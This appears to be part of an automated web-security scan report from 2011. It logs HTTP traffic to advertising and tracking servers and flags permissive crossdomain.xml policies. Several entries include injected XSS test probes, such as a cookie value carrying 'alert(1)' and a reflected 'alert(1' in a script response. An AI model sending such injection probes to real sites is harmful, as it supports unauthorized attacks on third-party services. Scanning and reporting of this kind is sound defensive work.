GET /rjss/bs.serving-sys.com Host: fw.adsafeprotected.com Proxy-Connection: keep-alive Referer: http://www.google.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: JSESSIONID=BE57AD10F Content-Type: text/javascript Content-Length: 8047 Date: Mon, 09 May 2011 15:39:53 GMT Connection: close var adsafeVisParams = { mode : "jss", jsref : "http://www.google.com adsafeSrc : "http://fw.adsafepro ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://480-adver-view |
Path: | /c3VTabstrct-6-2.php |
GET /c3VTabstrct-6-2.php?id Host: 480-adver-view.c3metrics Proxy-Connection: keep-alive Referer: http://optimized-by User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: C3UID=13014572191303 |
HTTP/1.1 200 OK Date: Mon, 09 May 2011 15:39:05 GMT Server: Apache P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT" Cache-Control: no-cache Expires: -1 Set-Cookie: 480-SM=adver_05-02-2011 Set-Cookie: 480-VT=aol_05-05-2011-12 Set-Cookie: 480-nUID=adver_93233 Content-Length: 6699 Connection: close Content-Type: text/html if(!window.c3VTconsts) ...[SNIP]... ].loadNewP();this ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://ar.voicefive.com |
Path: | /bmx3/broker.pli |
GET /bmx3/broker.pli?pid Host: ar.voicefive.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ar_p91300630=exp=1 |
HTTP/1.1 200 OK Server: nginx Date: Mon, 09 May 2011 15:35:25 GMT Content-Type: application/x-javascript Connection: close Set-Cookie: ar_p97174789=exp=41 Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com; P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT" Cache-Control: max-age=0, no-cache, no-store, must-revalidate Pragma: no-cache Expires: -1 Vary: User-Agent,Accept Content-Length: 25787 if(typeof(COMSCORE)!= ...[SNIP]... 91151&arc=6108747&', "UID": '875e3f1e-184.84.247.65 ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://ar.voicefive.com |
Path: | /bmx3/broker.pli |
GET /bmx3/broker.pli?pid Host: ar.voicefive.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ar_p91300630=exp=1 |
HTTP/1.1 200 OK Server: nginx Date: Mon, 09 May 2011 15:35:25 GMT Content-Type: application/x-javascript Connection: close Set-Cookie: ar_p97174789=exp=41 Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com; P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT" Cache-Control: max-age=0, no-cache, no-store, must-revalidate Pragma: no-cache Expires: -1 Vary: User-Agent,Accept Content-Length: 25787 if(typeof(COMSCORE)!= ...[SNIP]... 15:29:45 2011&prad=253735207&arc ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://ar.voicefive.com |
Path: | /bmx3/broker.pli |
GET /bmx3/broker.pli?pid Host: ar.voicefive.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ar_p91300630=exp=1 |
HTTP/1.1 200 OK Server: nginx Date: Mon, 09 May 2011 15:35:25 GMT Content-Type: application/x-javascript Connection: close Set-Cookie: ar_p97174789=exp=41 Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com; P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT" Cache-Control: max-age=0, no-cache, no-store, must-revalidate Pragma: no-cache Expires: -1 Vary: User-Agent,Accept Content-Length: 25787 if(typeof(COMSCORE)!= ...[SNIP]... 2011&prad=2108505&arc ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://ar.voicefive.com |
Path: | /bmx3/broker.pli |
GET /bmx3/broker.pli?pid Host: ar.voicefive.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ar_p91300630=exp=1 |
HTTP/1.1 200 OK Server: nginx Date: Mon, 09 May 2011 15:35:24 GMT Content-Type: application/x-javascript Connection: close Set-Cookie: ar_p97174789=exp=41 Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com; P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT" Cache-Control: max-age=0, no-cache, no-store, must-revalidate Pragma: no-cache Expires: -1 Vary: User-Agent,Accept Content-Length: 25787 if(typeof(COMSCORE)!= ...[SNIP]... Apr 26 18:36:13 2011&recExp=Wed Apr 27 12:40:21 2011&prad=296638425&arc ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://ar.voicefive.com |
Path: | /bmx3/broker.pli |
GET /bmx3/broker.pli?pid Host: ar.voicefive.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ar_p91300630=exp=1 |
HTTP/1.1 200 OK Server: nginx Date: Mon, 09 May 2011 15:35:24 GMT Content-Type: application/x-javascript Connection: close Set-Cookie: ar_p97174789=exp=41 Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com; P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT" Cache-Control: max-age=0, no-cache, no-store, must-revalidate Pragma: no-cache Expires: -1 Vary: User-Agent,Accept Content-Length: 25787 if(typeof(COMSCORE)!= ...[SNIP]... Apr 24 12:09:48 2011&recExp=Mon May 9 15:29:45 2011&prad=253735207&arc ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://ar.voicefive.com |
Path: | /bmx3/broker.pli |
GET /bmx3/broker.pli?pid Host: ar.voicefive.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ar_p91300630=exp=1 |
HTTP/1.1 200 OK Server: nginx Date: Mon, 09 May 2011 15:35:24 GMT Content-Type: application/x-javascript Connection: close Set-Cookie: ar_p97174789=exp=41 Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com; P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT" Cache-Control: max-age=0, no-cache, no-store, must-revalidate Pragma: no-cache Expires: -1 Vary: User-Agent,Accept Content-Length: 25787 if(typeof(COMSCORE)!= ...[SNIP]... u May 5 00:58:23 2011&recExp=Thu May 5 00:58:23 2011&prad=310177527&arc ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://ar.voicefive.com |
Path: | /bmx3/broker.pli |
GET /bmx3/broker.pli?pid Host: ar.voicefive.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ar_p91300630=exp=1 |
HTTP/1.1 200 OK Server: nginx Date: Mon, 09 May 2011 15:35:24 GMT Content-Type: application/x-javascript Connection: close Set-Cookie: ar_p97174789=exp=41 Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com; P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT" Cache-Control: max-age=0, no-cache, no-store, must-revalidate Pragma: no-cache Expires: -1 Vary: User-Agent,Accept Content-Length: 25787 if(typeof(COMSCORE)!= ...[SNIP]... 27 19:31:14 2011&recExp=Wed Apr 27 19:31:14 2011&prad=2108505&arc ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://ar.voicefive.com |
Path: | /bmx3/broker.pli |
GET /bmx3/broker.pli?pid Host: ar.voicefive.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ar_p91300630=exp=1 |
HTTP/1.1 200 OK Server: nginx Date: Mon, 09 May 2011 15:35:24 GMT Content-Type: application/x-javascript Connection: close Set-Cookie: ar_p97174789=exp=41 Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com; P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT" Cache-Control: max-age=0, no-cache, no-store, must-revalidate Pragma: no-cache Expires: -1 Vary: User-Agent,Accept Content-Length: 25787 if(typeof(COMSCORE)!= ...[SNIP]... 739&arc=40422016&', "BMX_G": 'method->-1,ts- ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://ar.voicefive.com |
Path: | /bmx3/broker.pli |
GET /bmx3/broker.pli?pid Host: ar.voicefive.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ar_p91300630=exp=1 |
HTTP/1.1 200 OK Server: nginx Date: Mon, 09 May 2011 15:35:24 GMT Content-Type: application/x-javascript Connection: close Set-Cookie: ar_p97174789=exp=41 Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com; P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT" Cache-Control: max-age=0, no-cache, no-store, must-revalidate Pragma: no-cache Expires: -1 Vary: User-Agent,Accept Content-Length: 25787 if(typeof(COMSCORE)!= ...[SNIP]... &prad=3992125865291151 ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://ar.voicefive.com |
Path: | /bmx3/broker.pli |
GET /bmx3/broker.pli?pid Host: ar.voicefive.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ar_p91300630=exp=1 |
HTTP/1.1 200 OK Server: nginx Date: Mon, 09 May 2011 15:35:24 GMT Content-Type: application/x-javascript Connection: close Set-Cookie: ar_p97174789=exp=41 Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com; P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT" Cache-Control: max-age=0, no-cache, no-store, must-revalidate Pragma: no-cache Expires: -1 Vary: User-Agent,Accept Content-Length: 25787 if(typeof(COMSCORE)!= ...[SNIP]... &recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://ar.voicefive.com |
Path: | /bmx3/broker.pli |
GET /bmx3/broker.pli?pid Host: ar.voicefive.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ar_p91300630=exp=1 |
HTTP/1.1 200 OK Server: nginx Date: Mon, 09 May 2011 15:35:24 GMT Content-Type: application/x-javascript Connection: close Set-Cookie: ar_p97174789=exp=41 Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com; P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT" Cache-Control: max-age=0, no-cache, no-store, must-revalidate Pragma: no-cache Expires: -1 Vary: User-Agent,Accept Content-Length: 25787 if(typeof(COMSCORE)!= ...[SNIP]... 1&recExp=Wed Apr 27 12:40:09 2011&prad=296638419&arc ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://ar.voicefive.com |
Path: | /bmx3/broker.pli |
GET /bmx3/broker.pli?pid Host: ar.voicefive.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ar_p91300630=exp=1 |
HTTP/1.1 200 OK Server: nginx Date: Mon, 09 May 2011 15:35:24 GMT Content-Type: application/x-javascript Connection: close Set-Cookie: ar_p97174789=exp=41 Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com; P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT" Cache-Control: max-age=0, no-cache, no-store, must-revalidate Pragma: no-cache Expires: -1 Vary: User-Agent,Accept Content-Length: 25787 if(typeof(COMSCORE)!= ...[SNIP]... onload); }}}}}},f:[],done:false ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://ar.voicefive.com |
Path: | /bmx3/broker.pli |
GET /bmx3/broker.pli?pid Host: ar.voicefive.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ar_p91300630=exp=1 |
HTTP/1.1 200 OK Server: nginx Date: Mon, 09 May 2011 15:35:24 GMT Content-Type: application/x-javascript Connection: close Set-Cookie: ar_p97174789=exp=41 Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com; P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT" Cache-Control: max-age=0, no-cache, no-store, must-revalidate Pragma: no-cache Expires: -1 Vary: User-Agent,Accept Content-Length: 25787 if(typeof(COMSCORE)!= ...[SNIP]... 5207&arc=178113566&', "ar_p82806590": 'exp=1&initExp=Thu Apr 28 21:29:14 2011&recExp=Thu Apr 28 21:29:14 2011&prad=62872739&arc ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://d7.zedo.com |
Path: | /bar/v16-406/d3/jsc/fm.js |
GET /bar/v16-406/d3/jsc/fm.js Host: d7.zedo.com Proxy-Connection: keep-alive Referer: http://www.csmonitor.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ZEDOIDX=29; ZEDOIDA=5ajh4goBADQA |
HTTP/1.1 200 OK Server: ZEDO 3G Content-Type: application/x-javascript Set-Cookie: FFad=0;expires=Tue, 10 May 2011 05:00:00 GMT;domain=.zedo.com;path Set-Cookie: FFcat=1099,2,9;expires ETag: "ae1b52-8181-4a207a1 Vary: Accept-Encoding X-Varnish: 1332201874 1332193309 P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml" Cache-Control: max-age=157 Expires: Mon, 09 May 2011 15:38:49 GMT Date: Mon, 09 May 2011 15:36:12 GMT Connection: close Content-Length: 2010 // Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved. var p9=new Image(); var zzD=window.document; if(typeof zzuid=='undefined'){ var zzuid='unknown';} var zzSection=1;var zzPat='';var zzCusto ...[SNIP]... AABN~0423112b78a"-alert(1 var zzhasAd=undefined; var zzStr = "s=1;u=5ajh4goBADQAA var ainfo = ""; var zzDate = new Date(); var zzWindow; var zzURL; if (typeof zzCustom =='undefined'){var zzIdxCustom ='';} else{var zzIdxCustom = zzCustom;} if (typeof zzTrd ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://d7.zedo.com |
Path: | /bar/v16-406/d3/jsc/fmr |
GET /bar/v16-406/d3/jsc/fmr Host: d7.zedo.com Proxy-Connection: keep-alive Referer: http://www.csmonitor.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ZEDOIDX=29; ZEDOIDA=5ajh4goBADQA |
HTTP/1.1 200 OK Server: ZEDO 3G Content-Type: application/x-javascript Set-Cookie: FFChanCap=1573B496,121 Set-Cookie: FFcat=1099,2,9;expires Set-Cookie: FFad=0;expires=Tue, 10 May 2011 05:00:00 GMT;domain=.zedo.com;path ETag: "ae1b52-8181-4a207a1 Vary: Accept-Encoding X-Varnish: 1332201874 1332193309 P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml" Cache-Control: max-age=159 Expires: Mon, 09 May 2011 15:38:49 GMT Date: Mon, 09 May 2011 15:36:10 GMT Connection: close Content-Length: 2052 // Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved. var p9=new Image(); var zzD=window.document; if(typeof zzuid=='undefined'){ var zzuid='unknown';} var zzSection=1;var zzPat='';var zzCusto ...[SNIP]... zzuid=='unknown')zzuid= var zzhasAd=undefined; var zzStr = "s=1;u=5ajh4goBADQAA var ainfo = ""; var zzDate = new Date(); var zzWindow; var zzURL; if (typeof zzCustom =='undefined'){var zzIdxCustom ='';} else{var zzIdxCustom = zzCustom;} if (typeof zzTrd ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://ib.adnxs.com |
Path: | /acb |
GET /acb?member=311&width=728 Host: ib.adnxs.com Proxy-Connection: keep-alive Referer: http://optimized-by User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: acb145072=5_[r^kI/7ZVO@Lm |
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, private Pragma: no-cache Expires: Sat, 15 Nov 2008 16:00:00 GMT P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC" Set-Cookie: sess=1; path=/; expires=Tue, 10-May-2011 15:37:21 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: uuid2=2724386019227846218 Set-Cookie: acb145072=; path=/; expires=Fri, 01-Jan-1980 00:00:00 GMT; domain=.adnxs.com; HttpOnly Content-Type: text/html; charset=utf-8 Set-Cookie: uuid2=2724386019227846218 Set-Cookie: anj=Kfw)(CZ#0s(F?Mc9aQ3p9 Date: Mon, 09 May 2011 15:37:21 GMT Content-Length: 2869 <html><body style="margin-left: 0%; margin-right: 0%; margin-top: 0%; margin-bottom: 0%"><script type="text/javascript" var str=''; str += '<script type="text\/javascript"> \n'; ...[SNIP]... m/adnxs_imp?returnType ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://ib.adnxs.com |
Path: | /acb |
GET /acb?member=311&width=728 Host: ib.adnxs.com Proxy-Connection: keep-alive Referer: http://optimized-by User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: sess=1; icu=ChIIhboCEAoYAiAC |
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, private Pragma: no-cache Expires: Sat, 15 Nov 2008 16:00:00 GMT P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC" Set-Cookie: sess=1; path=/; expires=Tue, 10-May-2011 15:39:01 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: uuid2=2724386019227846218 Set-Cookie: acb893170=; path=/; expires=Fri, 01-Jan-1980 00:00:00 GMT; domain=.adnxs.com; HttpOnly Content-Type: text/html; charset=utf-8 Set-Cookie: uuid2=2724386019227846218 Set-Cookie: anj=Kfw)(CZ#0s(F?MZ/Hw6M9 Date: Mon, 09 May 2011 15:39:01 GMT Content-Length: 2748 <html><body style="margin-left: 0%; margin-right: 0%; margin-top: 0%; margin-bottom: 0%"><script type="text/javascript" var str=''; str += '<script type="text\/javascript"> \n'; ...[SNIP]... m/adnxs_imp?returnType ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://k.collective-media |
Path: | /cmadj/cm.rub_usatoday/ |
GET /cmadj/cm.rub_usatoday/ Host: k.collective-media.net Proxy-Connection: keep-alive Referer: http://optimized-by User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: cli=11f8f328940989ed1063'%3balert(1)/ |
HTTP/1.1 200 OK Server: nginx/0.8.53 Content-Type: application/x-javascript P3P: policyref="http://a Vary: Accept-Encoding Date: Mon, 09 May 2011 15:37:05 GMT Connection: close Set-Cookie: mmpg=1; domain=collective-media Content-Length: 7736 function cmIV_(){var a=this;this.ts=null;this ...[SNIP]... t language="Javascript" ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://optimized-by |
Path: | /a/4462/5032/7108-2.html |
GET /a/4462/5032/7108-2.html HTTP/1.1 Host: optimized-by.rubicon Proxy-Connection: keep-alive Referer: http://www.usatoday.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: put_2025=549188a1-a07c |
HTTP/1.1 200 OK Date: Mon, 09 May 2011 15:37:28 GMT Server: RAS/1.3 (Unix) Set-Cookie: rdk=4462/5032; expires=Mon, 09-May-2011 16:37:28 GMT; max-age=60; path=/; domain=.rubiconproject Set-Cookie: rdk2=0; expires=Mon, 09-May-2011 16:37:28 GMT; max-age=10; path=/; domain=.rubiconproject Set-Cookie: ses2=12590^2&13549^1&5032 P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT" Set-Cookie: csi2=3164882.js^2 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Wed, 17 Sep 1975 21:32:10 GMT Content-Type: text/html Via: CN-5000 Proxy-Connection: Keep-Alive Content-Length: 1479 <html> <head> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="expires" content="0"> <script type="text/javascript"> rubicon_cb = Math.random(); rubicon_rurl = docum ...[SNIP]... <img src="http://trgca.opt ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://a.collective-media |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: a.collective-media.net |
HTTP/1.0 200 OK Server: nginx/0.8.53 Content-Type: text/plain Content-Length: 187 Last-Modified: Tue, 31 Aug 2010 17:41:28 GMT Accept-Ranges: bytes Date: Mon, 09 May 2011 15:36:58 GMT Connection: close Set-Cookie: JY57=CT; expires=Mon, 06-Jun-2011 15:36:58 GMT; path=/; domain=.collective-media P3P: CP="DSP NOI ADM PSAo PSDo OUR BUS NAV COM UNI INT" <?xml version="1.0" ?> <cross-domain-policy> <allow-access-from domain="*" secure="false"/> <allow-http-request </cross-domain-policy> |
Severity: | High |
Confidence: | Certain |
Host: | http://a1.interclick.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: a1.interclick.com |
HTTP/1.1 200 OK Content-Type: text/xml Last-Modified: Tue, 19 Apr 2011 21:44:21 GMT Accept-Ranges: bytes ETag: "7b643f1dafecb1:0" Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET P3P: policyref="http://www Date: Mon, 09 May 2011 15:38:17 GMT Connection: close Content-Length: 225 ...<?xml version="1.0" encoding="utf-8" ?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*" /> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://action.mathtag.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: action.mathtag.com |
HTTP/1.1 200 OK Set-Cookie: uuid=703ddf34-92af-425c Content-Type: text/xml P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA" Content-Length: 215 Date: Mon, 09 May 2011 15:39:14 GMT Accept-Ranges: bytes Cache-Control: no-store Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*" /> </cross- ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://ad.amgdgt.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: ad.amgdgt.com |
HTTP/1.1 200 OK Server: Apache/2.2.3 (CentOS) Last-Modified: Fri, 21 May 2010 08:32:40 GMT ETag: "85814f-12e-4871688bd9a00 Cache-Control: max-age=21600 Expires: Mon, 09 May 2011 19:27:14 GMT Content-Type: text/xml Content-Length: 302 Date: Mon, 09 May 2011 15:35:20 GMT X-Varnish: 1625213256 1625133942 Age: 7680 Via: 1.1 varnish Connection: keep-alive <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*" /> <allow-access-from domain="all" /> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://ad.doubleclick.net |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: ad.doubleclick.net |
HTTP/1.0 200 OK Server: DCLK-HttpSvr Content-Type: text/xml Content-Length: 258 Last-Modified: Thu, 18 Sep 2003 20:42:14 GMT Date: Mon, 09 May 2011 15:35:02 GMT <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <!-- Policy file for http://www.doubleclick <cross-domain-policy> ...[SNIP]... <allow-access-from domain="*" /> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://ads.pointroll.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: ads.pointroll.com |
